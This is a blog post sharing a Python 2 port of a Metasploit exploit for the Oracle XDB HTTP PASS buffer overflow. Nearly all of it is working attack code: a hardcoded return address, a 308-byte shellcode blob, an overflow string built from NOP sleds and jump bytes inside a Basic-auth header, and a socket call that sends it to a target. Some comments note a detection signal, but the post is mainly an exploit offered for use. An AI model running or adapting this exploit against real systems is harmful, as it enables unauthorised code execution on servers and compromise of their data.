Tuesday, April 5, 2016

Oracle XDB HTTP PASS Buffer Overflow in Python

I had to convert the msf module https://www.exploit-db.com/exploits/16809/ to Python for a project, so here it is:


#!/usr/bin/env python
#converted from https://www.exploit-db.com/exploits/16809/
#@atucom
#
# Python 2 script: base64.b64encode() and socket.send() are handed str
# objects, which raises TypeError on Python 3 (bytes required).
# It sends one HTTP GET whose Basic-auth credential is an oversized
# string; nothing is read back and the socket is never closed.
import socket
import base64
rhost = '192.168.1.10'  # target address (placeholder value)
rport = 8080            # XDB HTTP listener port used by the original module
target = (rhost,rport)
#ret = "60616d46"
ret = "\x46\x6d\x61\x60" #Universal ret -- little-endian byte order of the 0x60616d46 value above

#use msfvenom to change to your own payload
# Opaque payload bytes carried over from the original module
# (22 lines x 14 bytes = 308 bytes); nothing in this script interprets them.
buf = "\xb8\xad\x82\x42\xbe\xdb\xcb\xd9\x74\x24\xf4\x5d\x29\xc9" +\
      "\xb1\x47\x83\xc5\x04\x31\x45\x0f\x03\x45\xa2\x60\xb7\x42" +\
      "\x54\xe6\x38\xbb\xa4\x87\xb1\x5e\x95\x87\xa6\x2b\x85\x37" +\
      "\xac\x7e\x29\xb3\xe0\x6a\xba\xb1\x2c\x9c\x0b\x7f\x0b\x93" +\
      "\x8c\x2c\x6f\xb2\x0e\x2f\xbc\x14\x2f\xe0\xb1\x55\x68\x1d" +\
      "\x3b\x07\x21\x69\xee\xb8\x46\x27\x33\x32\x14\xa9\x33\xa7" +\
      "\xec\xc8\x12\x76\x67\x93\xb4\x78\xa4\xaf\xfc\x62\xa9\x8a" +\
      "\xb7\x19\x19\x60\x46\xc8\x50\x89\xe5\x35\x5d\x78\xf7\x72" +\
      "\x59\x63\x82\x8a\x9a\x1e\x95\x48\xe1\xc4\x10\x4b\x41\x8e" +\
      "\x83\xb7\x70\x43\x55\x33\x7e\x28\x11\x1b\x62\xaf\xf6\x17" +\
      "\x9e\x24\xf9\xf7\x17\x7e\xde\xd3\x7c\x24\x7f\x45\xd8\x8b" +\
      "\x80\x95\x83\x74\x25\xdd\x29\x60\x54\xbc\x25\x45\x55\x3f" +\
      "\xb5\xc1\xee\x4c\x87\x4e\x45\xdb\xab\x07\x43\x1c\xcc\x3d" +\
      "\x33\xb2\x33\xbe\x44\x9a\xf7\xea\x14\xb4\xde\x92\xfe\x44" +\
      "\xdf\x46\x50\x15\x4f\x39\x11\xc5\x2f\xe9\xf9\x0f\xa0\xd6" +\
      "\x1a\x30\x6b\x7f\xb0\xca\xfb\x40\xed\xfd\xad\x28\xec\xfd" +\
      "\x40\x68\x79\x1b\x08\x7a\x2c\xb3\xa4\xe3\x75\x4f\x55\xeb" +\
      "\xa3\x35\x55\x67\x40\xc9\x1b\x80\x2d\xd9\xcb\x60\x78\x83" +\
      "\x5d\x7e\x56\xae\x61\xea\x5d\x79\x36\x82\x5f\x5c\x70\x0d" +\
      "\x9f\x8b\x0b\x84\x35\x74\x63\xe9\xd9\x74\x73\xbf\xb3\x74" +\
      "\x1b\x67\xe0\x26\x3e\x68\x3d\x5b\x93\xfd\xbe\x0a\x40\x55" +\
      "\xd7\xb0\xbf\x91\x78\x4a\xea\x23\x44\x9d\xd2\x51\xa4\x1d"

# Decoded credential layout: "AAAA:" then 442 filler bytes, the two-byte
# sequences, ret, and runs of 0x90 padding around buf.  Total decoded
# length is 4+1+442+2+2+4+266+2+109+308 = 1140 bytes -- far beyond any
# real user:password pair, which is the simplest detection signal for this
# request (an Authorization: Basic header whose base64 value decodes to
# roughly 1 KB).
sploit1 = "A" * 4 + ":" + "A" * 442 + "\xeb\x64" + "\x90\x90" + ret + "\x90" *266 + "\xeb\x10" + "\x90" * 109 + buf
# Only two headers are sent (Host, Authorization); "\r\n\r\n" closes the
# header block.  Note the name "res" below holds the request, not a response.
req  = "Authorization: Basic "+ base64.b64encode(sploit1) +"\r\n\r\n"
res  = "GET / HTTP/1.1\r\n" + "Host: " +rhost+":"+str(rport)+"\r\n" + req
# Plain TCP connect with no timeout; send() is called once and the script
# exits without reading a reply or closing the socket, so it gives no
# indication of whether the service accepted the request.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
s.send(res)
